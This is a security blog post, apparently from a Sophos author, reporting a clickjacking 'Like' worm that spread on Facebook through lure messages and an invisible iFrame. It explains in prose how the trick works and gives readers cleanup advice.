Viral clickjacking 'Like' worm hits Facebook users

Filed Under: Clickjacking, Facebook, Malware, Social networks, Spam

Hundreds of thousands of Facebook users have fallen for a social-engineering trick which allowed a clickjacking worm to spread quickly over Facebook this holiday weekend.

Affected profiles can be identified by seeing that the Facebook user has apparently "liked" a link:

Girl gets owned after a police officer reads her status message

Messages seen being used by the spammers include:

"LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE."

"This man takes a picture of himself EVERYDAY for 8 YEARS!!"

"The Prom Dress That Got This Girl Suspended From School."

"This Girl Has An Interesting Way Of Eating A Banana, Check It Out!"

Clicking on the links takes Facebook users to what appears to be a blank page with just the message "Click here to continue".

Click to continue

However, clicking at any point of the page publishes the same message (via an invisible iFrame) to their own Facebook page, in a similar fashion to the "Fbhole" worm we saw earlier this month.

The trick, which uses a clickjacking exploit, means that visiting users are tricked into "liking" a page without necessarily realising they are recommending it to all of their Facebook friends.

Unfortunately, as we're all too aware, messages such as "LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE.", "This man takes a picture of himself EVERYDAY for 8 YEARS!!", "The Prom Dress That Got This Girl Suspended From School." and "This Girl Has An Interesting Way Of Eating A Banana, Check It Out!" are exactly the kind of content that people will click on on Facebook.

Sophos detects the offending webpages as being infected by Troj/Iframe-ET.

If you believe you may have been hit by this attack, view the recent activity on your news feed and delete entries related to the above links. Furthermore, you should view your profile, click on your Info tab and remove any of the pages from your "Likes and interests" section.

If you're regular user of Facebook, you should join the Sophos page on Facebook to be kept informed of the latest security threats.

Update Richard Cohen of SophosLabs has also blogged about this threat, which he nicknames "Likejacking".

, , ,

You might like

About the author

Graham Cluley is an award-winning security blogger, and veteran of the anti-virus industry having worked for a number of security companies since the early 1990s. Now an independent security analyst, he regularly makes media appearances and gives computer security presentations. Send Graham an email, subscribe to his updates on Facebook, follow him on Twitter and App.net, and circle him on Google Plus for regular updates.